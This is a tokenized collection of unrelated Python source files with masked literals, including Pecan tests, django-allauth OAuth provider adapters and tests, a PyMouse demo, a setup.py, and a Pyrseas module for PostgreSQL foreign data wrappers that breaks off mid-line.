<EOL> r = app . post_json ( '<STR_LIT>' , { '<STR_LIT:foo>' : '<STR_LIT:bar>' } , <EOL> headers = { '<STR_LIT>' : uniq } ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> json_resp = loads ( r . body . decode ( ) ) <EOL> assert json_resp [ '<STR_LIT:foo>' ] == '<STR_LIT:bar>' <EOL> def test_generics_with_im_self_with_extra_args ( self ) : <EOL> uniq = str ( time . time ( ) ) <EOL> with mock . patch ( '<STR_LIT>' , side_effect = AssertionError ( ) ) : <EOL> app = TestApp ( Pecan ( self . root ( uniq ) , use_context_locals = False ) ) <EOL> r = app . get ( '<STR_LIT>' , headers = { '<STR_LIT>' : uniq } ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> json_resp = loads ( r . body . decode ( ) ) <EOL> assert json_resp [ '<STR_LIT>' ] == '<STR_LIT>' <EOL> assert json_resp [ '<STR_LIT>' ] == '<STR_LIT>' </s>
<s> from django . db import migrations </s>
<s> from allauth . socialaccount . providers . oauth2 . urls import default_urlpatterns <EOL> from . provider import AmazonProvider <EOL> urlpatterns = default_urlpatterns ( AmazonProvider ) </s>
<s> from allauth . socialaccount . tests import OAuth2TestsMixin <EOL> from allauth . tests import MockedResponse , TestCase <EOL> from . provider import BitlyProvider <EOL> class BitlyTests ( OAuth2TestsMixin , TestCase ) : <EOL> provider_id = BitlyProvider . id <EOL> def get_mocked_response ( self ) : <EOL> return MockedResponse ( <NUM_LIT:200> , """<STR_LIT>""" ) </s>
<s> from allauth . socialaccount . tests import OAuth2TestsMixin <EOL> from allauth . tests import MockedResponse , TestCase <EOL> from . provider import EdmodoProvider <EOL> class EdmodoTests ( OAuth2TestsMixin , TestCase ) : <EOL> provider_id = EdmodoProvider . id <EOL> def get_mocked_response ( self ) : <EOL> return MockedResponse ( <NUM_LIT:200> , """<STR_LIT>""" ) </s>
<s> import requests <EOL> from allauth . socialaccount . providers . oauth2 . views import ( OAuth2Adapter , <EOL> OAuth2LoginView , <EOL> OAuth2CallbackView ) <EOL> from . provider import FoursquareProvider <EOL> class FoursquareOAuth2Adapter ( OAuth2Adapter ) : <EOL> provider_id = FoursquareProvider . id <EOL> access_token_url = '<STR_LIT>' <EOL> authorize_url = '<STR_LIT>' <EOL> profile_url = '<STR_LIT>' <EOL> def complete_login ( self , request , app , token , ** kwargs ) : <EOL> resp = requests . get ( <EOL> self . profile_url , <EOL> params = { '<STR_LIT>' : token . token , '<STR_LIT:v>' : '<STR_LIT>' } ) <EOL> extra_data = resp . json ( ) [ '<STR_LIT>' ] [ '<STR_LIT:user>' ] <EOL> return self . get_provider ( ) . sociallogin_from_response ( request , <EOL> extra_data ) <EOL> oauth2_login = OAuth2LoginView . adapter_view ( FoursquareOAuth2Adapter ) <EOL> oauth2_callback = OAuth2CallbackView . adapter_view ( FoursquareOAuth2Adapter ) </s>
<s> from xml . etree import ElementTree <EOL> from xml . parsers . expat import ExpatError <EOL> from django . utils import six <EOL> from allauth . socialaccount import providers <EOL> from allauth . socialaccount . providers . oauth . client import OAuth <EOL> from allauth . socialaccount . providers . oauth . views import ( OAuthAdapter , <EOL> OAuthLoginView , <EOL> OAuthCallbackView ) <EOL> from . provider import LinkedInProvider <EOL> class LinkedInAPI ( OAuth ) : <EOL> url = '<STR_LIT>' <EOL> def get_user_info ( self ) : <EOL> fields = providers . registry . by_id ( LinkedInProvider . id ) . get_profile_fields ( ) <EOL> url = self . url + '<STR_LIT>' % '<STR_LIT:U+002C>' . join ( fields ) <EOL> raw_xml = self . query ( url ) <EOL> if not six . PY3 : <EOL> raw_xml = raw_xml . encode ( '<STR_LIT:utf8>' ) <EOL> try : <EOL> return self . to_dict ( ElementTree . fromstring ( raw_xml ) ) <EOL> except ( ExpatError , KeyError , IndexError ) : <EOL> return None <EOL> def to_dict ( self , xml ) : <EOL> """<STR_LIT>""" <EOL> children = list ( xml ) <EOL> if not children : <EOL> return xml . text <EOL> else : <EOL> out = { } <EOL> for node in list ( xml ) : <EOL> if node . tag in out : <EOL> if not isinstance ( out [ node . tag ] , list ) : <EOL> out [ node . tag ] = [ out [ node . tag ] ] <EOL> out [ node . tag ] . append ( self . to_dict ( node ) ) <EOL> else : <EOL> out [ node . tag ] = self . to_dict ( node ) <EOL> return out <EOL> class LinkedInOAuthAdapter ( OAuthAdapter ) : <EOL> provider_id = LinkedInProvider . id <EOL> request_token_url = '<STR_LIT>' <EOL> access_token_url = '<STR_LIT>' <EOL> authorize_url = '<STR_LIT>' <EOL> def complete_login ( self , request , app , token , response ) : <EOL> client = LinkedInAPI ( request , app . client_id , app . secret , <EOL> self . request_token_url ) <EOL> extra_data = client . get_user_info ( ) <EOL> return self . get_provider ( ) . sociallogin_from_response ( request , <EOL> extra_data ) <EOL> oauth_login = OAuthLoginView . adapter_view ( LinkedInOAuthAdapter ) <EOL> oauth_callback = OAuthCallbackView . adapter_view ( LinkedInOAuthAdapter ) </s>
<s> from openid . consumer import consumer <EOL> from django . core . urlresolvers import reverse <EOL> from allauth . utils import get_user_model <EOL> from allauth . tests import TestCase , Mock , patch <EOL> from . import views <EOL> from . utils import AXAttribute <EOL> class OpenIDTests ( TestCase ) : <EOL> def test_discovery_failure ( self ) : <EOL> """<STR_LIT>""" <EOL> resp = self . client . post ( reverse ( '<STR_LIT>' ) , <EOL> dict ( openid = '<STR_LIT>' ) ) <EOL> self . assertTrue ( '<STR_LIT>' in resp . context [ '<STR_LIT>' ] . errors ) <EOL> def test_login ( self ) : <EOL> resp = self . client . post ( reverse ( views . login ) , <EOL> dict ( openid = '<STR_LIT>' ) ) <EOL> assert '<STR_LIT>' in resp [ '<STR_LIT:location>' ] <EOL> with patch ( '<STR_LIT>' <EOL> '<STR_LIT>' ) as consumer_mock : <EOL> client = Mock ( ) <EOL> complete = Mock ( ) <EOL> consumer_mock . return_value = client <EOL> client . complete = complete <EOL> complete_response = Mock ( ) <EOL> complete . return_value = complete_response <EOL> complete_response . status = consumer . SUCCESS <EOL> complete_response . identity_url = '<STR_LIT>' <EOL> with patch ( '<STR_LIT>' <EOL> '<STR_LIT>' ) as sr_mock : <EOL> with patch ( '<STR_LIT>' <EOL> '<STR_LIT>' ) as fr_mock : <EOL> sreg_mock = Mock ( ) <EOL> ax_mock = Mock ( ) <EOL> sr_mock . fromSuccessResponse = sreg_mock <EOL> fr_mock . fromSuccessResponse = ax_mock <EOL> sreg_mock . return_value = { } <EOL> ax_mock . return_value = { AXAttribute . PERSON_FIRST_NAME : <EOL> [ '<STR_LIT>' ] } <EOL> resp = self . client . post ( reverse ( '<STR_LIT>' ) ) <EOL> self . assertRedirects ( <EOL> resp , <EOL> '<STR_LIT>' , <EOL> fetch_redirect_response = False ) <EOL> get_user_model ( ) . objects . get ( first_name = '<STR_LIT>' ) </s>
<s> from allauth . socialaccount import providers <EOL> from allauth . socialaccount . providers . base import ProviderAccount <EOL> from allauth . socialaccount . providers . oauth2 . provider import OAuth2Provider <EOL> class ShopifyAccount ( ProviderAccount ) : <EOL> pass <EOL> class ShopifyProvider ( OAuth2Provider ) : <EOL> id = '<STR_LIT>' <EOL> name = '<STR_LIT>' <EOL> account_class = ShopifyAccount <EOL> def get_auth_params ( self , request , action ) : <EOL> ret = super ( ShopifyProvider , self ) . get_auth_params ( request , action ) <EOL> shop = request . GET . get ( '<STR_LIT>' , None ) <EOL> if shop : <EOL> ret . update ( { '<STR_LIT>' : shop } ) <EOL> return ret <EOL> def get_default_scope ( self ) : <EOL> return [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> def extract_uid ( self , data ) : <EOL> return str ( data [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] ) <EOL> def extract_common_fields ( self , data ) : <EOL> return dict ( email = data [ '<STR_LIT>' ] [ '<STR_LIT:email>' ] ) <EOL> providers . registry . register ( ShopifyProvider ) </s>
<s> import requests <EOL> from allauth . socialaccount . providers . oauth2 . views import ( OAuth2Adapter , <EOL> OAuth2LoginView , <EOL> OAuth2CallbackView ) <EOL> from . provider import TwitchProvider <EOL> class TwitchOAuth2Adapter ( OAuth2Adapter ) : <EOL> provider_id = TwitchProvider . id <EOL> access_token_url = '<STR_LIT>' <EOL> authorize_url = '<STR_LIT>' <EOL> profile_url = '<STR_LIT>' <EOL> def complete_login ( self , request , app , token , ** kwargs ) : <EOL> resp = requests . get ( <EOL> self . profile_url , <EOL> params = { '<STR_LIT>' : token . token , <EOL> '<STR_LIT>' : app . client_id } ) <EOL> extra_data = resp . json ( ) <EOL> return self . get_provider ( ) . sociallogin_from_response ( request , <EOL> extra_data ) <EOL> oauth2_login = OAuth2LoginView . adapter_view ( TwitchOAuth2Adapter ) <EOL> oauth2_callback = OAuth2CallbackView . adapter_view ( TwitchOAuth2Adapter ) </s>
<s> from django . conf . urls import url <EOL> from . import views <EOL> urlpatterns = [ <EOL> url ( '<STR_LIT>' , views . login_cancelled , <EOL> name = '<STR_LIT>' ) , <EOL> url ( '<STR_LIT>' , views . login_error , name = '<STR_LIT>' ) , <EOL> url ( '<STR_LIT>' , views . signup , name = '<STR_LIT>' ) , <EOL> url ( '<STR_LIT>' , views . connections , name = '<STR_LIT>' ) <EOL> ] </s>
<s> from django . conf . urls import patterns , url <EOL> from demoproject . filter import views <EOL> urlpatterns = patterns ( <EOL> '<STR_LIT>' , <EOL> url ( r'<STR_LIT>' , views . user_list_view , name = '<STR_LIT>' ) , <EOL> ) </s>
<s> from pymouse import PyMouse <EOL> import random , time <EOL> try : <EOL> from pymouse import PyMouseEvent <EOL> class event ( PyMouseEvent ) : <EOL> def move ( self , x , y ) : <EOL> print "<STR_LIT>" , x , y <EOL> def click ( self , x , y , button , press ) : <EOL> if press : <EOL> print "<STR_LIT>" , x , y , "<STR_LIT>" , button <EOL> else : <EOL> print "<STR_LIT>" , x , y , "<STR_LIT>" , button <EOL> e = event ( ) <EOL> e . start ( ) <EOL> except ImportError : <EOL> print "<STR_LIT>" <EOL> m = PyMouse ( ) <EOL> try : <EOL> size = m . screen_size ( ) <EOL> print "<STR_LIT>" % ( str ( size ) ) <EOL> pos = ( random . randint ( <NUM_LIT:0> , size [ <NUM_LIT:0> ] ) , random . randint ( <NUM_LIT:0> , size [ <NUM_LIT:1> ] ) ) <EOL> except : <EOL> pos = ( random . randint ( <NUM_LIT:0> , <NUM_LIT> ) , random . randint ( <NUM_LIT:0> , <NUM_LIT> ) ) <EOL> print "<STR_LIT>" % ( str ( pos ) ) <EOL> m . move ( pos [ <NUM_LIT:0> ] , pos [ <NUM_LIT:1> ] ) <EOL> time . sleep ( <NUM_LIT:2> ) <EOL> m . click ( pos [ <NUM_LIT:0> ] , pos [ <NUM_LIT:1> ] , <NUM_LIT:1> ) <EOL> time . sleep ( <NUM_LIT:2> ) <EOL> m . click ( pos [ <NUM_LIT:0> ] , pos [ <NUM_LIT:1> ] , <NUM_LIT:2> ) <EOL> time . sleep ( <NUM_LIT:2> ) <EOL> m . click ( pos [ <NUM_LIT:0> ] , pos [ <NUM_LIT:1> ] , <NUM_LIT:3> ) <EOL> try : <EOL> e . stop ( ) <EOL> except : <EOL> pass </s>
<s> from setuptools import setup <EOL> import stallion <EOL> import sys <EOL> install_requirements = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> try : <EOL> import json <EOL> except ImportError : <EOL> install_requirements . append ( '<STR_LIT>' ) <EOL> def long_description ( ) : <EOL> if sys . version_info >= ( <NUM_LIT:3> , <NUM_LIT:0> , <NUM_LIT:0> ) : <EOL> f = open ( "<STR_LIT>" , mode = "<STR_LIT:r>" , encoding = "<STR_LIT:utf-8>" ) <EOL> else : <EOL> f = open ( "<STR_LIT>" , mode = "<STR_LIT:r>" ) <EOL> return f . read ( ) <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = stallion . __version__ , <EOL> url = '<STR_LIT>' , <EOL> license = '<STR_LIT>' , <EOL> author = stallion . __author__ , <EOL> author_email = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> long_description = long_description ( ) , <EOL> packages = [ '<STR_LIT>' ] , <EOL> keywords = '<STR_LIT>' , <EOL> platforms = '<STR_LIT>' , <EOL> zip_safe = False , <EOL> include_package_data = True , <EOL> package_data = { <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> } , <EOL> install_requires = install_requirements , <EOL> tests_require = [ '<STR_LIT>' ] , <EOL> test_suite = '<STR_LIT>' , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] , <EOL> entry_points = { <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] , <EOL> } , <EOL> ) </s>
<s> from __future__ import division <EOL> import numpy as np <EOL> def mymean ( x ) : <EOL> return np . ma . mean ( x ) </s>
<s> """<STR_LIT>""" <EOL> from pyrseas . dbobject import DbObjectDict , DbObject <EOL> from pyrseas . dbobject import quote_id , commentable , ownable , grantable <EOL> from pyrseas . dbobject . table import ClassDict , Table <EOL> from pyrseas . dbobject . privileges import privileges_from_map <EOL> class DbObjectWithOptions ( DbObject ) : <EOL> """<STR_LIT>""" <EOL> def options_clause ( self ) : <EOL> """<STR_LIT>""" <EOL> opts = [ ] <EOL> for opt in self . options : <EOL> ( nm , val ) = opt . split ( '<STR_LIT:=>' , <NUM_LIT:1> ) <EOL> opts . append ( "<STR_LIT>" % ( nm , val ) ) <EOL> return "<STR_LIT>" % '<STR_LIT:U+002CU+0020>' . join ( opts ) <EOL> def diff_options ( self , newopts ) : <EOL> """<STR_LIT>""" <EOL> def to_dict ( optlist ) : <EOL> return dict ( opt . split ( '<STR_LIT:=>' , <NUM_LIT:1> ) for opt in optlist ) <EOL> oldopts = { } <EOL> if hasattr ( self , '<STR_LIT>' ) : <EOL> oldopts = to_dict ( self . options ) <EOL> newopts = to_dict ( newopts ) <EOL> clauses = [ ] <EOL> for key , val in list ( newopts . items ( ) ) : <EOL> if key not in oldopts : <EOL> clauses . append ( "<STR_LIT>" % ( key , val ) ) <EOL> elif val != oldopts [ key ] : <EOL> clauses . append ( "<STR_LIT>" % ( key , val ) ) <EOL> for key , val in list ( oldopts . items ( ) ) : <EOL> if key not in newopts : <EOL> clauses . append ( "<STR_LIT>" % key ) <EOL> return clauses and "<STR_LIT>" % '<STR_LIT:U+002CU+0020>' . join ( clauses ) or '<STR_LIT>' <EOL> def diff_map ( self , inobj ) : <EOL> """<STR_LIT>""" <EOL> stmts = super ( DbObjectWithOptions , self ) . diff_map ( inobj ) <EOL> newopts = [ ] <EOL> if hasattr ( inobj , '<STR_LIT>' ) : <EOL> newopts = inobj . options <EOL> diff_opts = self . diff_options ( newopts ) <EOL> if diff_opts : <EOL> stmts . append ( "<STR_LIT>" % ( <EOL> self . objtype , self . identifier ( ) , diff_opts ) ) <EOL> return stmts <EOL> class ForeignDataWrapper ( DbObjectWithOptions ) : <EOL> """<STR_LIT>""" <EOL> objtype = "<STR_LIT>" <EOL> single_extern_file = True <EOL> @ property <EOL> def allprivs ( self ) : <EOL> return '<STR_LIT>' <EOL> def to_map ( self , no_owner , no_privs ) : <EOL> """<STR_LIT>""" <EOL> wrapper = self . _base_map ( no_owner , no_privs ) <EOL> if hasattr ( self , '<STR_LIT>' ) : <EOL> srvs = { } <EOL> for srv in self . servers : <EOL> srvs . update ( self . servers [ srv ] . to_map ( no_owner , no_privs ) ) <EOL> wrapper . update ( srvs ) <EOL> del wrapper [ '<STR_LIT>' ] <EOL> return wrapper <EOL> @ commentable <EOL> @ grantable <EOL> @ ownable <EOL> def create ( self ) : <EOL> """<STR_LIT>""" <EOL> clauses = [ ] <EOL> for fnc in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> if hasattr ( self , fnc ) : <EOL> clauses . append ( "<STR_LIT>" % ( fnc . upper ( ) , getattr ( self , fnc ) ) ) <EOL> if hasattr ( self , '<STR_LIT>' ) : <EOL> clauses . append ( self . options_clause ( ) ) <EOL> return [ "<STR_LIT>" % ( <EOL> quote_id ( self . name ) , <EOL> clauses and '<STR_LIT>' + '<STR_LIT>' . join ( clauses ) or '<STR_LIT>' ) ] <EOL> def diff_map ( self , inwrapper ) : <EOL> """<STR_LIT>""" <EOL> stmts = super ( ForeignDataWrapper , self ) . diff_map ( inwrapper ) <EOL> if inwrapper . owner is not None : <EOL> if inwrapper . owner != self . owner : <EOL> stmts . append ( self . alter_owner ( inwrapper . owner ) ) <EOL> stmts . append ( self . diff_description ( inwrapper ) ) <EOL> return stmts <EOL> QUERY_PRE91 = """<STR_LIT>""" <EOL> class ForeignDataWrapperDict ( DbObjectDict ) : <EOL> "<STR_LIT>" <EOL> cls = ForeignDataWrapper <EOL> query = """<STR_LIT>""" <EOL> def _from_catalog ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . dbconn . version < <NUM_LIT> : <EOL> self . query = QUERY_PRE91 <EOL> super ( ForeignDataWrapperDict , self ) . _from_catalog ( ) <EOL> def from_map ( self , inwrappers , newdb ) : <EOL> """<STR_LIT>""" <EOL> for key in inwrappers : <EOL> if not key . startswith ( '<STR_LIT>' ) : <EOL> raise KeyError ( "<STR_LIT>" % key ) <EOL> fdw = key [ <NUM_LIT> : ] <EOL> self [ fdw ] = wrapper = ForeignDataWrapper ( name = fdw ) <EOL> inwrapper = inwrappers [ key ] <EOL> inservs = { } <EOL> for key in inwrapper : <EOL> if key . startswith ( '<STR_LIT>' ) : <EOL> inservs . update ( { key : inwrapper [ key ] } ) <EOL> elif key in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT:description>' ] : <EOL> setattr ( wrapper , key , inwrapper [ key ] ) <EOL> elif key == '<STR_LIT>' : <EOL> wrapper . privileges = privileges_from_map ( <EOL> inwrapper [ key ] , wrapper . allprivs , inwrapper [ '<STR_LIT>' ] ) <EOL> else : <EOL> raise KeyError ( "<STR_LIT>" % key ) <EOL> newdb . servers . from_map ( wrapper , inservs , newdb ) <EOL> def link_refs ( self , dbservers ) : <EOL> """<STR_LIT>""" <EOL> for ( fdw , srv ) in dbservers : <EOL> dbserver = dbservers [ ( fdw , srv ) ] <EOL> assert self [ fdw ] <EOL> wrapper = self [ fdw ] <EOL> if not hasattr ( wrapper , '<STR_LIT>' ) : <EOL> wrapper . servers = { } <EOL> wrapper . servers . update ( { srv : dbserver } ) <EOL> def diff_map ( self , inwrappers ) : <EOL> """<STR_LIT>""" <EOL> stmts = [ ] <EOL> for fdw in inwrappers : <EOL> infdw = inwrappers [ fdw ] <EOL> if fdw in self : <EOL> stmts . append ( self [ fdw ] . diff_map ( infdw ) ) <EOL> else : <EOL> if hasattr ( infdw , '<STR_LIT>' ) : <EOL> oldname = infdw . oldname <EOL> try : <EOL> stmts . append ( self [ oldname ] . rename ( infdw . name ) ) <EOL> del self [ oldname ] <EOL> except KeyError as exc : <EOL> exc . args = ( "<STR_LIT>" <EOL> "<STR_LIT>" % ( oldname , infdw . name ) , ) <EOL> raise <EOL> else : <EOL> stmts . append ( infdw . create ( ) ) <EOL> for fdw in self : <EOL> if fdw not in inwrappers : <EOL> self [ fdw ] . dropped = True <EOL> return stmts <EOL> def _drop ( self ) : <EOL> """<STR_LIT>""" <EOL> stmts = [ ] <EOL> for fdw in self : <EOL> if hasattr ( self [ fdw ] , '<STR_LIT>' ) : <EOL> stmts . append ( self [ fdw ] . drop ( ) ) <EOL> return stmts <EOL> class ForeignServer ( DbObjectWithOptions ) : <EOL> """<STR_LIT>""" <EOL> objtype = "<STR_LIT>" <EOL> privobjtype = "<STR_LIT>" <EOL> keylist = [ '<STR_LIT>' , '<STR_LIT:name>' ] <EOL> @ property <EOL> def allprivs ( self ) : <EOL> return '<STR_LIT>' <EOL> def identifier ( self ) : <EOL> """<STR_LIT>""" <EOL> return quote_id ( self . name ) <EOL> def to_map ( self , no_owner , no_privs ) : <EOL> """<STR_LIT>""" <EOL> key = self . extern_key ( ) <EOL> server = { key : self . _base_map ( no_owner , no_privs ) } <EOL> if hasattr ( self , '<STR_LIT>' ) : <EOL> umaps = { } <EOL> for umap in self . usermaps : <EOL> umaps . update ( { umap : self . usermaps [ umap ] . to_map ( ) } ) <EOL> server [ key ] [ '<STR_LIT>' ] = umaps <EOL> del server [ key ] [ '<STR_LIT>' ] <EOL> return server <EOL> @ commentable <EOL> @ grantable <EOL> @ ownable <EOL> def create ( self ) : <EOL> """<STR_LIT>""" <EOL> clauses = [ ] <EOL> options = [ ] <EOL> for opt in [ '<STR_LIT:type>' , '<STR_LIT:version>' ] : <EOL> if hasattr ( self , opt ) : <EOL> clauses . append ( "<STR_LIT>" % ( opt . upper ( ) , getattr ( self , opt ) ) ) <EOL> if hasattr ( self , '<STR_LIT>' ) : <EOL> options . append ( self . options_clause ( ) ) <EOL> return [ "<STR_LIT>" % ( <EOL> quote_id ( self . name ) , <EOL> clauses and '<STR_LIT:U+0020>' + '<STR_LIT:U+0020>' . join ( clauses ) or '<STR_LIT>' , <EOL> quote_id ( self . wrapper ) , <EOL> options and '<STR_LIT>' + '<STR_LIT>' . join ( options ) or '<STR_LIT>' ) ] <EOL> def diff_map ( self , inserver ) : <EOL> """<STR_LIT>""" <EOL> stmts = super ( ForeignServer , self ) . diff_map ( inserver ) <EOL> if inserver . owner is not None : <EOL> if inserver . owner != self . owner : <EOL> stmts . append ( self . alter_owner ( inserver . owner ) ) <EOL> stmts . append ( self . diff_description ( inserver ) ) <EOL> return stmts <EOL> class ForeignServerDict ( DbObjectDict ) : <EOL> "<STR_LIT>" <EOL> cls = ForeignServer <EOL> query = """<STR_LIT>""" <EOL> def from_map ( self , wrapper , inservers , newdb ) : <EOL> """<STR_LIT>""" <EOL> for key in inservers : <EOL> if not key . startswith ( '<STR_LIT>' ) : <EOL> raise KeyError ( "<STR_LIT>" % key ) <EOL> srv = key [ <NUM_LIT:7> : ] <EOL> self [ ( wrapper . name , srv ) ] = serv = ForeignServer ( <EOL> wrapper = wrapper . name , name = srv ) <EOL> inserv = inservers [ key ] <EOL> if inserv : <EOL> for attr , val in list ( inserv . items ( ) ) : <EOL> setattr ( serv , attr , val ) <EOL> if '<STR_LIT>' in inserv : <EOL> newdb . usermaps . from_map ( serv , inserv [ '<STR_LIT>' ] ) <EOL> if '<STR_LIT>' in inserv : <EOL> del inserv [ '<STR_LIT>' ] <EOL> if '<STR_LIT>' in inserv : <EOL> serv . privileges = privileges_from_map ( <EOL> inserv [ '<STR_LIT>' ] , serv . allprivs , serv . owner ) <EOL> def to_map ( self , no_owner , no_privs ) : <EOL> """<STR_LIT>""" <EOL> servers = { } <EOL> for srv in self : <EOL> servers . update ( self [ srv ] . to_map ( no_owner , no_privs ) ) <EOL> return servers <EOL> def link_refs ( self , dbusermaps ) : <EOL> """<STR_LIT>""" <EOL> for ( fdw , srv , usr ) in dbusermaps : <EOL> dbusermap = dbusermaps [ ( fdw , srv , usr ) ] <EOL> assert self [ ( fdw , srv ) ] <EOL> server = self [ ( fdw , srv ) ] <EOL> if not hasattr ( server , '<STR_LIT>' ) : <EOL> server . usermaps = { } <EOL> server . usermaps . update ( { usr : dbusermap } ) <EOL> def diff_map ( self , inservers ) : <EOL> """<STR_LIT>""" <EOL> stmts = [ ] <EOL> for ( fdw , srv ) in inservers : <EOL> insrv = inservers [ ( fdw , srv ) ] <EOL> if ( fdw , srv ) in self : <EOL> stmts . append ( self [ ( fdw , srv ) ] . diff_map ( insrv ) ) <EOL> else : <EOL> if hasattr ( insrv , '<STR_LIT>' ) : <EOL> oldname = insrv . oldname <EOL> try : <EOL> stmts . append ( self [ ( fdw , oldname ) ] . rename ( insrv . name ) ) <EOL> del self [ oldname ] <EOL> except KeyError as exc : <EOL> exc . args = ( "<STR_LIT>" <EOL> "<STR_LIT>" % ( oldname , insrv . name ) , ) <EOL> raise <EOL> else : <EOL> stmts . append ( insrv . create ( ) ) <EOL> for srv in self : <EOL> if srv not in inservers : <EOL> self [ srv ] . dropped = True <EOL> return stmts <EOL> def _drop ( self ) : <EOL> """<STR_LIT>""" <EOL> stmts = [ ] <EOL> for srv in self : <EOL> if hasattr ( self [ srv ] , '<STR_LIT>' ) : <EOL> stmts . append ( self [ srv ] . drop ( ) ) <EOL> return stmts <EOL> class UserMapping ( DbObjectWithOptions ) : <EOL> """<STR_LIT>""" <EOL> objtype = "<STR_LIT>" <EOL> keylist = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:name>' ] <EOL> def extern_key ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . name <EOL> def identifier ( self ) : <EOL> """<STR_LIT>""" <EOL> return "<STR_LIT>" % ( <EOL> self . name == '<STR_LIT>' and '<STR_LIT>' or quote_id ( self . name ) , <EOL> quote_id ( self . server ) ) <EOL> def create ( self ) : <EOL> """<STR_LIT>""" <EOL> options = [ ] <EOL> if hasattr ( self , '<STR_LIT>' ) : <EOL> options . append ( self . options_clause ( ) ) <EOL> return [ "<STR_LIT>" % ( <EOL> self . name == '<STR_LIT>' and '<STR_LIT>' or <EOL> quote_id ( self . name ) , quote_id ( self . server ) , <EOL> options and '<STR_LIT>' + '<STR_LIT>' . join ( options ) or '<STR_LIT>' ) ] <EOL> class UserMappingDict ( DbObjectDict ) : <EOL> "<STR_LIT>" <EOL> cls = UserMapping <EOL> query = """<STR_LIT>""" <EOL> def from_map ( self , server , inusermaps ) : <EOL> """<STR_LIT>""" <EOL> for key in inusermaps : <EOL> usermap = UserMapping ( wrapper = server . wrapper , server = server . name , <EOL> name = key ) <EOL> inusermap = inusermaps [ key ] <EOL> if inusermap : <EOL> for attr , val in list ( inusermap . items ( ) ) : <EOL> setattr ( usermap , attr , val ) <EOL> if '<STR_LIT>' in inusermap : <EOL> del inusermap [ '<STR_LIT>' ] <EOL> self [ ( server . wrapper , server . name , key ) ] = usermap <EOL> def to_map ( self ) : <EOL> """<STR_LIT>""" <EOL> usermaps = { } <EOL> for um in self : <EOL> usermaps . update ( self [ um ] . to_map ( ) ) <EOL> return usermaps <EOL> def diff_map ( self , inusermaps ) : <EOL> """<STR_LIT>""" <EOL> stmts = [ ] <EOL> for ( fdw , srv , usr ) in inusermaps : <EOL> inump = inusermaps [ ( fdw , srv , usr ) ] <EOL> if ( fdw , srv , usr ) in self : <EOL> stmts . append ( self [ ( fdw , srv , usr ) ] . diff_map ( inump ) ) <EOL> else : <EOL> if hasattr ( inump , '<STR_LIT>' ) : <EOL> oldname = inump . oldname <EOL> try : <EOL> stmts . append ( self [ ( fdw , srv , oldname ) ] . rename ( <EOL> inump . name ) ) <EOL> del self [ ( fdw , srv , oldname ) ] <EOL> except KeyError as exc : <EOL> exc . args = ( "<STR_LIT>" <EOL> "<STR_LIT>" % ( oldname , inump . name ) , ) <EOL> raise <EOL> else : <EOL> stmts . append ( inump . create ( ) ) <EOL> for ( fdw , srv , usr ) in self : <EOL> if ( fdw , srv , usr ) not in inusermaps : <EOL> stmts . append ( self [ ( fdw , srv , usr ) ] . drop ( ) ) <EOL> return stmts <EOL> class ForeignTable ( DbObjectWithOptions , Table ) : <EOL> """<STR_LIT>""" <EOL> objtype = "<STR_LIT>" <EOL> privobjtype = "<STR_LIT>" <EOL> def to_map ( self , opts ) : <EOL> """<STR_LIT>""" <EOL> if hasattr ( opts , '<STR_LIT>' ) and opts . excl_tables and self . name in opts . excl_tables : <EOL> return { } <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> return { } <EOL> cols = [ ] <EOL> for i in range ( len ( self . columns ) ) : <EOL> col = self . columns [ i ] . to_map ( opts . no_privs ) <EOL> if col : <EOL> cols . append ( col ) <EOL> tbl = { '<STR_LIT>' : cols , '<STR_LIT>' : self . server } <EOL> attrlist = [ '<STR_LIT>' ] <EOL> if self . description is not None : <EOL> attrlist . append ( '<STR_LIT:description>' ) <EOL> if not opts . no_owner : <EOL> attrlist . append ( '<STR_LIT>' ) <EOL> for attr in attrlist : <EOL> if hasattr ( self , attr ) : <EOL> tbl . update ( { attr : getattr ( self , attr ) } ) <EOL> if not opts . no_privs and self . privileges : <EOL> tbl . update ( { '<STR_LIT>' : self . map_privs ( ) } ) <EOL> return tbl <EOL> @ grantable <EOL> def create ( self ) : <EOL> """<STR_LIT>""" <EOL> stmts = [ ] <EOL> cols = [ ] <EOL> options = [ ] <EOL> for col in self . columns : <EOL> cols . append ( "<STR_LIT:U+0020>" + col . add ( ) [ <NUM_LIT:0> ] ) <EOL> if hasattr ( self , '<STR_LIT>' ) : <EOL> options . append ( self . options_clause ( ) ) <EOL> stmts . append ( "<STR_LIT>" % ( <EOL> self . qualname ( ) , "<STR_LIT>" . join ( cols ) , self . server , <EOL> options and '<STR_LIT>' + '<STR_LIT>' . join ( options ) or '<STR_LIT>' ) ) <EOL> if self . owner is not None : <EOL> stmts . append ( self . alter_owner ( ) ) <EOL> if self . description is not None : <EOL> stmts . append ( self . comment ( ) ) <EOL> for col in self . columns : <EOL> if col . description is not None : <EOL> stmts . append ( col . comment ( ) ) <EOL> return stmts <EOL> def drop ( self ) : <EOL> """<STR_LIT>""" <EOL> return "<STR_LIT>" % ( self . objtype , self . identifier ( ) ) <EOL> def diff_map ( self , intable ) : <EOL> """<STR_LIT>""" <EOL> stmts = super ( ForeignTable , self ) . diff_map ( intable ) <EOL> if intable . owner is not None : <EOL> if intable . owner != self . owner : <EOL> stmts . append ( self . alter_owner ( intable . owner ) 